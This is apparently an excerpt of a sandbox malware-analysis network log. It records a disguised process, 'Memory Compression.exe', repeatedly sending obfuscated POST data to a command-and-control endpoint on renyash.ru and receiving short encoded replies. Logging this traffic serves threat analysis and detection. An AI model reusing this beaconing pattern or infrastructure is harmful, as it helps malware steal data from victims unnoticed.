                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:39.423724890 CET1060OUTData Raw: 5f 50 5d 58 5f 5b 58 54 5c 5f 50 57 54 52 59 59 59 56 5b 51 57 5f 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _P]X_[XT\_PWTRYYYV[QW_T\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&3(?' ^&%\**9[=<Q %/=+6X!Q?*+.^''P*
                                                                                                                                Jan 11, 2025 15:03:39.508413076 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:39.753438950 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:39 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCrumRM%2ByZXL5%2BcZ1vr3XINdfYizaD2T%2B9etaO83ZzSAFzmLQsSGHF9KZFfh%2FeCxjrCplr0w7XptRGcU0yBJNWIOU8Ojk71vvwpX8qBUruUkEfMKthCZ446eE%2B%2Fpc8armdk3ExZk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057393ac7c0f5f-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2392&min_rtt=1490&rtt_var=2363&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=167642&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                86192.168.2.550068104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:39.930593967 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:40.283462048 CET1060OUTData Raw: 5a 54 5d 58 5f 5b 58 52 5c 5f 50 57 54 52 59 5e 59 50 5b 5e 57 5e 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZT]X_[XR\_PWTRY^YP[^W^TZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& 0>28#*_0/?9[=$760?"S<?^5 =+.^''P*
                                                                                                                                Jan 11, 2025 15:03:40.375108957 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:40.614862919 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GA%2B1OZZ73wsiEscU%2FpR2yx%2FeONGZqbYp4fNBPpzHHtbpA7zmlGDLOeSIbnlOhr30iUV1ibOUxYuCPkxOFoZYUtCbkMtoji5zQJWpgr1vvz64%2F62LR%2FthiOtDrp%2FGeMBHutDpaXad"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573991c088c3c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=1945&rtt_var=852&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=599343&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                87192.168.2.550069104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:40.740026951 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:41.095603943 CET1060OUTData Raw: 5f 56 5d 55 5f 5a 58 57 5c 5f 50 57 54 5c 59 59 59 50 5b 5b 57 51 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _V]U_ZXW\_PWT\YYYP[[WQT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X% +?T;7'5/?)[+( W#:)'?9+, '4(+.^''P*
                                                                                                                                Jan 11, 2025 15:03:41.192918062 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:41.361618996 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MN8Y0QU%2FRUwfol%2Bnfeqii%2Bi7h3YYCz92kvJic5wxiO4vpOAijLd0xv0Suc6rOG%2FQoLOTBDz6Utsz3hTZxwqFF4jkE6Le4CYCeUJ3CcfoY09uJ2Qc3TML9YKebMiivyPBIE5H9DvH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005739e2c61c452-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3018&min_rtt=1743&rtt_var=3205&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=122196&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                88192.168.2.550070104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:41.509505987 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:41.899643898 CET1060OUTData Raw: 5a 52 58 58 5a 59 58 53 5c 5f 50 57 54 54 59 5f 59 55 5b 50 57 53 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZRXXZYXS\_PWTTY_YU[PWSTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!'30Y>1+#!&&$^=9%\);07:93:+/Z 'S>.^''P*!
                                                                                                                                Jan 11, 2025 15:03:41.967371941 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:42.231849909 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:42 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPk8lZpENQntEStTLVOZtHk7aXueHB%2F5pCMqLTrFES2ZAdHmUc52DXyJV94yA9HN9g0va5SWtNQoKFmwCN4%2Fqrz1bNRCS%2BunkwBotmvdUBKg54GIkg%2BjfbjN28umD98CXDIsiXTd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573a30b6532c7-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4131&min_rtt=2004&rtt_var=5006&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=76753&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                89192.168.2.550071104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:42.383286953 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:42.736169100 CET1060OUTData Raw: 5a 55 58 5e 5f 5f 58 50 5c 5f 50 57 54 56 59 53 59 54 5b 50 57 51 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZUX^__XP\_PWTVYSYT[PWQTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X10$<#"_'C3=\); 70.T??6=.^''P*)
                                                                                                                                Jan 11, 2025 15:03:42.848376989 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:43.104707003 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XOeOQUVyGUtzfb6MlekQZx7%2BcmrneUqLI9o%2B6xamdCriFPf7u7Q%2FxWha4%2Bf6zQefQ%2BRPz9HwFKat%2FwxR62RlMY%2F9CfcmgT9etPA5l8aj7Ihfxx0aEXa1j6vn4NWVP4oPdSdhS9Nd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573a889b8c32d-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3403&min_rtt=1764&rtt_var=3939&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=98144&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                90192.168.2.550072104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:43.269805908 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:43.626976013 CET1060OUTData Raw: 5f 54 58 5d 5f 5a 58 54 5c 5f 50 57 54 53 59 53 59 51 5b 59 57 5f 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _TX]_ZXT\_PWTSYSYQ[YW_TQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_' 7(1+416'%)9!>+#::3*(&"4?S*.^''P*=


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                91192.168.2.550073104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:43.696176052 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1756
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:44.052280903 CET1756OUTData Raw: 5a 53 5d 5f 5f 5c 58 5c 5c 5f 50 57 54 51 59 5e 59 51 5b 5d 57 55 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS]__\X\\_PWTQY^YQ[]WUT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!\10_+< !0%X>_5++/ T'&T<("Q;).^''P*5
                                                                                                                                Jan 11, 2025 15:03:44.139620066 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:44.421714067 CET953INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FeCSbC8SjDvbhYyeYlJKxeyTlq9sNzdtqrq2hP%2FYhRVSba6e%2B9W3gRmG5YNrVuGoksE6phnDWd43Dc7yrrYzhe75tbd%2BrKsqTZpVKQi2pjambNqQc5DwaVCWA8%2FJaoeGY4YuOYFt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573b09dbd422f-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2352&min_rtt=1727&rtt_var=1897&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2066&delivery_rate=217035&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 58 23 3e 0f 08 35 3b 22 10 29 32 2f 58 25 30 0f 5a 3d 54 22 5a 26 3b 0e 5d 39 06 24 1a 35 04 20 10 27 00 25 5f 33 3e 2a 55 29 3b 2c 5d 00 10 23 08 33 20 2d 5c 2d 21 3d 1d 3d 0f 28 0a 37 2c 05 19 24 3b 25 0d 20 0d 30 03 23 3d 2a 02 38 31 01 50 39 27 2e 11 2d 3b 24 5a 37 0f 2b 55 00 14 20 57 26 39 33 03 3e 55 34 56 34 06 39 02 25 2b 33 0e 2a 3c 3f 0e 2a 3b 21 56 28 02 3a 1b 23 06 25 58 29 30 2f 1d 27 32 29 56 26 06 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'X#>5;")2/X%0Z=T"Z&;]9$5 '%_3>*U);,]#3 -\-!==(7,$;% 0#=*81P9'.-;$Z7+U W&93>U4V49%+3*<?*;!V(:#%X)0/'2)V&!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                92192.168.2.550074104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:43.992845058 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:44.348793983 CET1060OUTData Raw: 5f 56 5d 55 5f 5c 58 5d 5c 5f 50 57 54 56 59 5d 59 56 5b 5a 57 5e 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _V]U_\X]\_PWTVY]YV[ZW^T[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2X?/#!90%'):)+8 U!9U$*W<&!Q7V*.^''P*)
                                                                                                                                Jan 11, 2025 15:03:44.457180023 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:44.699799061 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di%2F89%2FjCMzepg9cEDGnm045ndmzeUJtMZDz9LJLdp8UgeGIPHS6wLOHr4b7KjXJIWI%2FStC77IfvrmT1uUu4I%2F7jOvujA2WD7KV3co5SZgnR5xA%2FymWfJ%2B4AZIwQ2AXMNsbPQL6Ml"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573b29ed34263-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3627&min_rtt=1740&rtt_var=4427&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=86693&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                93192.168.2.550075104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:44.838457108 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:45.189517975 CET1060OUTData Raw: 5f 5f 58 58 5f 5b 5d 54 5c 5f 50 57 54 5d 59 5b 59 55 5b 5b 57 54 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __XX_[]T\_PWT]Y[YU[[WTTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]&04]<<46]$*9*+349%<>S(@'"4 )+.^''P*
                                                                                                                                Jan 11, 2025 15:03:45.299422979 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:45.475250006 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:45 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lk%2F%2FXngoaWABi9RJe99hhH9ZT01Y%2BLRzwBJwHXftQ2dTL7LRUarERPdo2pzVFOiDg%2BuQMs9W6Wc2pNYvxu4MPF3Zu0QFk3bIC0UIShclCLzgpOx08oiwYZG56%2Fs6xRQBHap%2BGsUK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573b7dfd55e67-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7987&min_rtt=2237&rtt_var=12339&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=30266&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                94192.168.2.550076104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:45.607153893 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:45.954945087 CET1060OUTData Raw: 5a 55 5d 55 5f 59 5d 50 5c 5f 50 57 54 52 59 5f 59 5d 5b 5f 57 53 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]U_Y]P\_PWTRY_Y][_WST[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& >"< !0&;)99+;87&$2S*58"'#);.^''P*
                                                                                                                                Jan 11, 2025 15:03:46.072087049 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:46.298804045 CET25INHTTP/1.1 100 Continue
